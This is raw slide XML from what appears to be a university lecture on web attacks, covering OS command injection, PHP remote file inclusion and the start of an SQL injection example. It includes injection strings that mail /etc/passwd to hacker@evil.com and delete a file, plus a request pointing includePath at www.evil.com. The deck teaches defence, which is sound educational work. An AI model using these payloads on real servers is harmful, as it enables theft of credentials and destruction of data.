          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117683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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Command Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main problem: Incorrect (or complete lack of) validation of user input that results in the execution of OS commands on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use of (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unsanitized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) external input to compose strings that are passed to a function that can evaluate code or include code from a file (language-specific)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>include()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7187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US" dirty="0"/>
              <a:t>OS Command Injection Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="931843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: CGI program executes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command over a server file using the user input as parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hacker@evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  one can obtain the password file and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> \"$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By providing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"foo; mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>hacker@evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> &lt; /etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>one can steal the password file and delete the text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>system("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "e", $exp, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>phonebook.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this case the execution is similar to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and therefore more secure (no shell parsing involved)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11222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1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1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1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31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Requests – Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Start line, followed by headers, followed by body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Each line separated by CRLF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0"/>
              <a:t>Headers separated by body via empty line (just CRLF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13605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Preventing OS Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection is a sanitization problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never trust outside input when composing a command string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many languages provide built-in sanitization routines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escapeshellarg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): adds single quotes around a string and quotes/escapes any existing single quotes allowing one to pass a string directly to a shell function and having it be treated as a single safe argument</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>escapeshellcmd($str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>): escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands (#&amp;;`|*?~&lt;&gt;^()[]{}$\, \x0A and \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. ' and " are escaped only if they are not paired)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1533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Inclusion Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many web frameworks and languages allow  the developer to modularize his/her code by providing a module inclusion mechanism (similar to the #include directive in C)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If not configured correctly this can be used to inject attack code into the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload code that is then included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a remote code component (if the language supports remote inclusion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Influence the path used to locate the code component</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4908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Inclusion in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>allow_url_fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> directive allows URLs to be used when including files with include() and require()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If user input is used to create the name of the file to be open then a remote attacker can execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>mainapp.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>=‘/includes/’; // this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> will be visible </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>                           //in the included file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>library.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>library.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>include($includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t> . ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>math.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET /includes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>library.php?includePath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78490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US" dirty="0"/>
              <a:t>SQL Injection Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="940035" name="Picture 3" descr="login_asp"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="282575" y="1595182"/>
            <a:ext cx="8578850" cy="4181475"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="199607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0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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The Form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="942083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>login.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
